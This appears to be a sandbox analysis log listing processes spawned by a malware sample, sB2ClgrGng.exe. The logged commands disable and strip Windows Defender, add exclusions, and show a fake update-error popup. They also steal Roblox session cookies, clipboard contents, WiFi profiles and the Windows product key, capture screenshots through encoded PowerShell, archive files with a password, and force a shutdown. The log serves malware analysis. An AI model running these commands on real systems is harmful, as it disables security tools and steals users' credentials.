Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: unknown	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADCB.tmp" "c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: unknown	Process created: C:\Users\user\AppData\Roaming\word.exe "C:\Users\user\AppData\Roaming\word.exe"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *
Source: unknown	Process created: C:\Users\user\AppData\Roaming\word.exe "C:\Users\user\AppData\Roaming\word.exe"
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: unknown	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Process created: C:\Windows\System32\shutdown.exe shutdown.exe /f /s /t 0
Source: C:\Windows\System32\shutdown.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Users\user\Desktop\sB2ClgrGng.exe "C:\Users\user\Desktop\sB2ClgrGng.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
